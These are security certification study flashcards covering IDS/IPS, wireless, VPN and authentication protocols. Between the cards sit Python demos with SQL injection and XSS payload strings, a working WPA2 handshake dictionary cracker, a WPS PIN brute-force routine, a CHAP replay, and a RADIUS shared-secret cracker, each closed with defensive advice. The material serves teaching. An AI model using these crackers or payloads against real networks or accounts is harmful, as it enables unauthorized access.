IDSs and IPSs
inspect traffic using the same functionality as a protocol analyzer
HIDS
detect attacks on local systems such as workstations and servers; protect local resources on the host and can detect some malware that isn't detected by traditional antivirus software
NIDS
detects attacks on networks
Signature-based IDS/IPS
uses signatures to detect known attacks or vulnerabilities
Heuristic-based or Behavioral-based IDSs (Anomaly-based IDSs)
require a baseline and detect attacks based on anomalies or when traffic is outside expected boundaries
False Positive
incorrectly raises an alert indicating an attack when no attack is active; increases the workload of admins, who must investigate each one
False Negative
attack is active, but not reported
IPS
placed inline w/ traffic (in-band) and can stop attacks before they reach the internal network; actively monitor data streams, detect malicious content, prevent it from reaching a network
IDS/IPS
protect internal private networks, such as private supervisory control and data acquisition (SCADA) networks
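The signature/anomaly split and the false-positive/false-negative terms above are easiest to see with both engines run over the same traffic and scored against ground truth. The following is an added example, not code from the original notes: the web-server request lines, the baseline window, the source addresses and the signature rules are all constructed for illustration.

```python
import re
import statistics
from collections import Counter

# Constructed known-good window used to learn how many requests a "normal" source produces.
BASELINE = [
    ("10.0.0.5", "/index.html"), ("10.0.0.5", "/about.html"),
    ("10.0.0.6", "/index.html"), ("10.0.0.6", "/pricing.html"), ("10.0.0.6", "/contact.html"),
    ("10.0.0.8", "/index.html"), ("10.0.0.8", "/blog/1"),
]

# Constructed monitoring window: (source_ip, request_path, is_attack). The label is ground truth
# used only for scoring; a real sensor never sees it.
TRAFFIC = [
    ("10.0.0.5",  "/index.html", False),
    ("10.0.0.5",  "/help/select-a-plan-from-our-catalog", False),      # benign, trips the sloppy signature
    ("10.0.0.7",  "/login?user=admin' OR '1'='1", True),                # SQL injection tautology
    ("10.0.0.9",  "/search?q=<script>alert(1)</script>", True),         # reflected XSS probe
    ("10.0.0.12", "/report?id=1 UNION SELECT password FROM users", True),
    ("10.0.0.13", "/login?user=admin%27%20OR%20%271%27%3D%271", True),  # same tautology URL-encoded: evades the signature
    ("10.0.0.8",  "/blog/2", False),
] + [("10.0.0.66", f"/admin/backup{i}.zip", True) for i in range(12)]   # forced-browsing scan: no payload, just volume

SIGNATURES = {
    "sqli-tautology":   re.compile(r"(?i)'\s*or\s*'1'\s*=\s*'1"),
    "sqli-union":       re.compile(r"(?i)\bunion\s+select\b"),
    "xss-script-tag":   re.compile(r"(?i)<script"),
    "sqli-select-from": re.compile(r"(?i)select.+from"),   # too broad: the kind of rule that generates false positives
}

def signature_alerts(traffic):
    """Indexes of lines matching at least one signature (known attack patterns)."""
    return {i for i, (_ip, path, _label) in enumerate(traffic)
            if any(rx.search(path) for rx in SIGNATURES.values())}

def build_baseline(window):
    """Mean and standard deviation of requests per source in a known-good window."""
    per_source = list(Counter(ip for ip, _path in window).values())
    return statistics.mean(per_source), statistics.pstdev(per_source)

def anomaly_alerts(traffic, baseline, k=3.0):
    """Indexes of every line from a source whose volume exceeds mean + k*stdev of the baseline."""
    mean, stdev = baseline
    threshold = mean + k * stdev
    counts = Counter(ip for ip, _path, _label in traffic)
    noisy = {ip for ip, n in counts.items() if n > threshold}
    return {i for i, (ip, _path, _label) in enumerate(traffic) if ip in noisy}

def evaluate(traffic, flagged):
    """Score flagged line indexes against ground truth: true/false positives and negatives."""
    tp = fp = fn = tn = 0
    for i, (_ip, _path, is_attack) in enumerate(traffic):
        hit = i in flagged
        if hit and is_attack:
            tp += 1
        elif hit:
            fp += 1          # false positive: alert, no attack
        elif is_attack:
            fn += 1          # false negative: attack, no alert
        else:
            tn += 1
    return {"tp": tp, "fp": fp, "fn": fn, "tn": tn}

if __name__ == "__main__":
    sig = signature_alerts(TRAFFIC)
    ano = anomaly_alerts(TRAFFIC, build_baseline(BASELINE))
    print("signature:", evaluate(TRAFFIC, sig))
    print("anomaly:  ", evaluate(TRAFFIC, ano))
    print("combined: ", evaluate(TRAFFIC, sig | ano))
```

The signature engine catches the three plainly written payloads, misses the URL-encoded copy and the whole scan (13 false negatives), and raises one false positive on the benign "select ... from" path. The anomaly engine catches the scan by volume alone but has no opinion on the four single-request payloads. Running both shrinks the false negatives to one, which is why real deployments combine the two rather than choosing one.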
SSL/TLS Accelerators
dedicated hardware devices that handle TLS traffic; other devices, such as a web server, can off-load TLS traffic handling to the accelerator
SSL Decryptors
allow an organization to inspect traffic, even when traffic is using SSL/TLS
Software Defined Network (SDN)
uses virtualization technologies to route traffic instead of using hardware routers and switches; separates data and control planes
Honeypots and Honeynets
appear to have valuable data and attempt to divert attackers away from live networks; security personnel use them to observe current attack methodologies and gather intel on attacks
802.1X Server
provides strong port security using port-based authentication; prevents rogue devices from connecting to a network by ensuring that only authorized clients can connect; works with EAP, PEAP, EAP-TTLS, and EAP-FAST; the most secure EAP method is EAP-TLS
Wireless Access Points (WAP)
connect wireless clients to a wired network; typically use omnidirectional antennas
Fat AP (stand-alone AP)
everything needed to connect wireless clients to a wireless network
Thin APs
controller-based; controller configures and manages thin AP
SSID
name of wireless network; disabling SSID broadcast hides a wireless network from casual users only, since the SSID still appears in probe and association frames
MAC Filtering
restrict access to wireless networks; attackers can discover authorized MACs and spoof an authorized MAC address
Directional Antennas
narrower beams and longer ranges
Ad hoc Wireless Network
2+ devices connected together w/out an AP
Wi-Fi Protected Access (WPA)
WPA used TKIP; WPA2 uses CCMP with AES; WPA and TKIP have been deprecated
Pre-Shared Key (PSK)
used by personal mode; easy to implement and used in many smaller wireless networks
Enterprise Mode
more secure than personal mode; adds per-user authentication; uses an 802.1X authentication server, usually implemented as a RADIUS server
Open Mode
doesn't use a PSK or an 802.1X server; many hot spots use open mode when providing free wireless access to customers
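Why personal mode stands or falls on the passphrase: the PSK is derived from the passphrase and the SSID alone, and once an attacker has captured one four-way handshake every guess can be checked offline. The block below is an added example, not code from the original notes; it implements the PBKDF2 derivation and the PTK/MIC check that a cracking tool performs, and the SSID, MAC addresses, nonces and EAPOL frame bytes are constructed for the demonstration.

```python
import hashlib
import hmac

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Personal mode: PSK = PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf(key: bytes, label: bytes, data: bytes, length: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenated HMAC-SHA1 blocks over label || 0x00 || data || counter."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:length]

def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """First 16 bytes of the 384-bit CCMP PTK: the Key Confirmation Key that signs handshake frames."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]

def eapol_mic(kck, eapol_frame):
    """Key descriptor version 2 (WPA2/CCMP): HMAC-SHA1 truncated to 128 bits over the frame with its MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]

# Constructed handshake parameters: everything here travels in the clear and is visible to a passive sniffer.
SSID = "CorpGuest"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
EAPOL_MSG2 = bytes.fromhex("0103007502010a00") + bytes(109)   # EAPOL-Key message 2 shape, MIC bytes zeroed

def capture_handshake(passphrase):
    """What the AP and client exchange; only the MIC depends on the secret passphrase."""
    kck = kck_from_pmk(wpa2_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return {"ssid": SSID, "ap": AP_MAC, "sta": STA_MAC, "anonce": ANONCE, "snonce": SNONCE,
            "eapol": EAPOL_MSG2, "mic": eapol_mic(kck, EAPOL_MSG2)}

def crack_psk(capture, wordlist):
    """Offline dictionary attack: recompute the MIC per candidate; the AP is never contacted again."""
    for cand in wordlist:
        kck = kck_from_pmk(wpa2_pmk(cand, capture["ssid"]), capture["ap"], capture["sta"],
                           capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(kck, capture["eapol"]), capture["mic"]):
            return cand
    return None

if __name__ == "__main__":
    cap = capture_handshake("summer2019")
    print("recovered:", crack_psk(cap, ["password", "letmein", "summer2019"]))
```

The 4096 PBKDF2 iterations slow each guess down but do nothing against a short dictionary word, and the SSID acts as a salt only in the sense that precomputed tables are per-SSID (common default SSIDs are already covered by such tables). A long random passphrase, or enterprise mode, is the actual fix.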
EAP-TLS
most secure, requires certificate on the server and on each wireless client
EAP-TTLS and PEAP
require certificate on the server, but not the client
PEAP
often implemented w/ MS-CHAPv2.
LEAP
proprietary to Cisco and does not require certificate, replaced by EAP-FAST
Captive Portal
forces wireless clients to complete a process, such as acknowledging a policy or paying for access, before it grants them access to network
Disassociation Attack
effectively removes a wireless client from a network, forcing it to reauthenticate
WPS
allows users to easily configure a wireless device by pressing a button or entering a short PIN; NOT secure; attack can discover PIN within hours, PIN used to discover passphrase
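Why the WPS PIN falls "within hours": the eighth digit is a checksum of the first seven, and the AP acknowledges the first four digits separately from the last three, so the attacker searches 10,000 + 1,000 candidates instead of 10,000,000. The block below is an added example, not code from the original notes; the Registrar class is a stand-in for a real AP's WPS handshake and the target PINs are constructed.

```python
def wps_checksum(first_seven: int) -> int:
    """Eighth digit of a WPS PIN: weighted (3,1,3,1,...) sum of the first seven digits, complemented mod 10."""
    acc, n = 0, first_seven
    while n:
        acc += 3 * (n % 10)
        n //= 10
        acc += n % 10
        n //= 10
    return (10 - acc % 10) % 10

def wps_pin_valid(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(int(pin[:7])) == int(pin[7])

class Registrar:
    """Stand-in for the access point. Like the real protocol it reveals whether the first four
    digits were right (EAP-NACK after message M4) before it checks the last four (NACK after M6)."""
    def __init__(self, pin: str):
        self.pin = pin
        self.attempts = 0

    def try_pin(self, pin: str) -> str:
        self.attempts += 1
        if pin[:4] != self.pin[:4]:
            return "NACK after M4"
        if pin[4:] != self.pin[4:]:
            return "NACK after M6"
        return "M7"   # the AP now hands the WPA passphrase to the enrollee

def brute_force_pin(registrar: Registrar):
    """Two-phase search driven only by the registrar's responses."""
    # Phase 1: at most 10,000 guesses for the first half; the second half is any checksum-valid filler.
    first_half = None
    for i in range(10_000):
        half = f"{i:04d}"
        filler = half + "000"
        if registrar.try_pin(filler + str(wps_checksum(int(filler)))) != "NACK after M4":
            first_half = half
            break
    # Phase 2: at most 1,000 guesses, because the eighth digit is fixed by the checksum.
    for j in range(1_000):
        body = first_half + f"{j:03d}"
        pin = body + str(wps_checksum(int(body)))
        if registrar.try_pin(pin) == "M7":
            return pin
    return None

NAIVE_SEARCH_SPACE = 10 ** 7                 # 8 digits with the checksum already accounted for
EFFECTIVE_SEARCH_SPACE = 10 ** 4 + 10 ** 3   # what the split verification leaves

if __name__ == "__main__":
    ap = Registrar("12345670")               # a well-known factory default PIN
    print(brute_force_pin(ap), "after", ap.attempts, "attempts")
```

Rate limiting or lockout on the AP is the only thing that stretches 11,000 attempts into anything meaningful, and many consumer APs have none; disabling WPS is the practical answer.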
Rogue Access Point (rogue AP)
AP placed in network w/out official authorization
Evil Twin
rogue AP with same SSID as a legitimate AP
Jamming Attack
floods a wireless frequency w/ noise, blocking wireless traffic
Initialization Vector (IV)
IV attack exploits short or reused initialization vectors (the 24-bit IVs of WEP) to recover the key; WEP is deprecated for this reason
Near Field Communication (NFC)
attack uses an NFC reader to read data from mobile devices
Bluejacking
practice of sending unsolicited messages to a phone
Bluesnarfing
unauthorized access to, or theft of info from, a Bluetooth device
Wireless Replay Attack
attacker captures data sent b/w two entities, modifies it, then impersonates one of the parties by replaying the data (WPA2 using CCMP with AES prevents these attacks)
Radio-Frequency ID (RFID)
attacks include eavesdropping, replay, and DoS
VPN
provides access to private networks via a public network, such as the Internet
VPN Concentrators
dedicated devices that provide secure remote access to remote users
IPsec
common tunneling protocol used w/ VPNs; secures traffic within tunnel; provides authentication w/ AH & ESP
Encapsulating Security Payload (ESP)
encrypts VPN traffic and provides confidentiality, integrity, and authentication
IPsec Tunnel Mode
encrypts entire IP packets used in the internal network; some VPNs use TLS to encrypt traffic
IPsec Transport Mode
only encrypts payload and is commonly used in private networks, but not with VPNs
Full Tunnel
encrypts all traffic after user has connected to a VPN
Split Tunnel
only encrypts traffic destined for the VPN's private network; other traffic goes directly to the Internet, outside the organization's inspection
Site-to-Site VPNs
provide secure access b/w two networks; can be on-demand or always-on VPNs
Network Access Control (NAC)
inspects clients for specific health conditions such as up-to-date antivirus software; can redirect unhealthy clients to a remediation network
Permanent/persistent NAC Agent
installed on client and stays on client
Dissolvable NAC Agent (Agentless)
downloaded and run on the client when the client logs on, and deleted after the session ends; commonly used for employee-owned mobile devices
Remote Access Authentication
user accesses a private network from a remote location, such as w/ VPN connection
PAP
uses password or PIN for authentication; sends passwords in cleartext
CHAP
more secure than PAP; uses a challenge/response handshake when authenticating clients, so the password itself never crosses the link
MS-CHAPv2
provides mutual authentication
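The PAP versus CHAP difference above is clearest when both exchanges are written out and the link is eavesdropped. The block below is an added example, not code from the original notes: it implements CHAP-MD5 per RFC 1994 (Response = MD5(Identifier || secret || Challenge)), and the username, shared secret and the "wire" list that stands in for a captured link are constructed.

```python
import hashlib
import hmac
import os

SECRET = b"correct horse battery staple"   # constructed shared secret, configured on both ends

def chap_response(ident: int, secret: bytes, challenge: bytes) -> bytes:
    """RFC 1994 CHAP-MD5: Response = MD5(Identifier || secret || Challenge)."""
    return hashlib.md5(bytes([ident]) + secret + challenge).digest()

class Authenticator:
    """Remote-access server side; secrets maps username -> shared secret."""
    def __init__(self, secrets):
        self.secrets = secrets
        self.pending = {}       # identifier -> outstanding challenge (single use)
        self.next_id = 0

    def pap_verify(self, username, password):
        return self.secrets.get(username) == password

    def chap_challenge(self):
        ident, self.next_id = self.next_id, (self.next_id + 1) % 256
        self.pending[ident] = os.urandom(16)
        return ident, self.pending[ident]

    def chap_verify(self, ident, username, response):
        challenge = self.pending.pop(ident, None)   # a challenge can be answered once
        secret = self.secrets.get(username)
        if challenge is None or secret is None:
            return False
        return hmac.compare_digest(chap_response(ident, secret, challenge), response)

def pap_login(auth, wire, username, password):
    wire.append(("PAP Authenticate-Request", username, password))   # cleartext on the link
    return auth.pap_verify(username, password)

def chap_login(auth, wire, username, secret):
    ident, challenge = auth.chap_challenge()
    wire.append(("CHAP Challenge", ident, challenge))
    response = chap_response(ident, secret, challenge)
    wire.append(("CHAP Response", ident, username, response))    # a hash, not the secret
    ok = auth.chap_verify(ident, username, response)
    wire.append(("CHAP Success" if ok else "CHAP Failure", ident))
    return ok

def replay_captured_response(auth, wire):
    """An attacker who sniffed a CHAP exchange answers a fresh challenge with the old response."""
    _kind, _old_ident, username, old_response = next(m for m in wire if m[0] == "CHAP Response")
    ident, _challenge = auth.chap_challenge()
    return auth.chap_verify(ident, username, old_response)

def secret_seen_on_wire(wire, secret):
    """True if the secret appears verbatim in any captured message."""
    return any(secret in message for message in wire)

if __name__ == "__main__":
    auth = Authenticator({"alice": SECRET})
    pap_wire, chap_wire = [], []
    print("PAP ok:", pap_login(auth, pap_wire, "alice", SECRET), "secret on wire:", secret_seen_on_wire(pap_wire, SECRET))
    print("CHAP ok:", chap_login(auth, chap_wire, "alice", SECRET), "secret on wire:", secret_seen_on_wire(chap_wire, SECRET))
    print("replay ok:", replay_captured_response(auth, chap_wire))
```

Two caveats a practitioner should keep in mind: CHAP still requires the server to store the cleartext secret (it must compute the same MD5), and a captured challenge/response pair can be attacked offline by guessing the secret, so the protocol should run inside an encrypted tunnel (PEAP, TLS) rather than bare on the link.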
RADIUS
provides central authentication for multiple remote access services; relies on use of shared secrets and only encrypts password during authentication process; uses UDP
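What "only encrypts the password" means in practice: in a RADIUS Access-Request every attribute is sent in the clear except User-Password, which is XORed with an MD5 keystream derived from the shared secret and the Request Authenticator (RFC 2865 section 5.2). The block below is an added example, not code from the original notes; the shared secret, Request Authenticator, username and password are constructed, and the packet builder covers only the two attributes needed to show the point.

```python
import hashlib

def hide_password(password: bytes, shared_secret: bytes, authenticator: bytes) -> bytes:
    """RFC 2865 User-Password hiding: pad with NULs to a multiple of 16, then
    c_i = p_i XOR MD5(secret || c_(i-1)), with the Request Authenticator as c_0."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        block = hashlib.md5(shared_secret + prev).digest()
        prev = bytes(p ^ b for p, b in zip(padded[i:i + 16], block))
        out += prev
    return out

def reveal_password(hidden: bytes, shared_secret: bytes, authenticator: bytes) -> bytes:
    """Inverse operation performed by the RADIUS server, or by anyone holding the shared secret."""
    out, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        block = hashlib.md5(shared_secret + prev).digest()
        out += bytes(c ^ b for c, b in zip(hidden[i:i + 16], block))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")

def build_access_request(identifier: int, authenticator: bytes, username: bytes, hidden_pw: bytes) -> bytes:
    """Code 1 (Access-Request), Identifier, Length, 16-byte Request Authenticator, then the TLV
    attributes User-Name (type 1) and User-Password (type 2). Only the password value is hidden."""
    attrs = bytes([1, 2 + len(username)]) + username + bytes([2, 2 + len(hidden_pw)]) + hidden_pw
    return bytes([1, identifier]) + (20 + len(attrs)).to_bytes(2, "big") + authenticator + attrs

def parse_attributes(packet: bytes) -> dict:
    """Walk the TLV attribute list that follows the 20-byte header."""
    attrs, i = {}, 20
    while i < len(packet):
        attr_type, length = packet[i], packet[i + 1]
        attrs[attr_type] = packet[i + 2:i + length]
        i += length
    return attrs

def crack_shared_secret(packet: bytes, known_password: bytes, wordlist):
    """Offline attack on a captured Access-Request: one known password (e.g. the attacker's own
    account) lets each shared-secret guess be tested without touching the server."""
    authenticator, hidden = packet[4:20], parse_attributes(packet)[2]
    for guess in wordlist:
        if reveal_password(hidden, guess, authenticator) == known_password:
            return guess
    return None

if __name__ == "__main__":
    secret = b"radius-secret-1"
    ra = bytes(range(16))          # constructed Request Authenticator; a real NAS uses random bytes
    pkt = build_access_request(7, ra, b"alice", hide_password(b"hunter2", secret, ra))
    print("username visible:", b"alice" in pkt, "| password visible:", b"hunter2" in pkt)
    print("secret recovered:", crack_shared_secret(pkt, b"hunter2", [b"secret", b"radius", secret]))
```

This is why RADIUS over UDP should run over an IPsec or TLS-protected link (or RadSec) and why the shared secret must be long and random: the hiding scheme protects the password only as well as the secret resists an offline guess.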
TACACS+
used by some Cisco systems as an alternative to RADIUS, uses TCP, encrypts entire authentication process and supports multiple challenges and responses
Diameter
improvement over RADIUS; uses TCP; encrypts entire authentication process, and supports many additional capabilities
Authentication, Authorization, Accounting (AAA) Protocols
RADIUS, TACACS+, and Diameter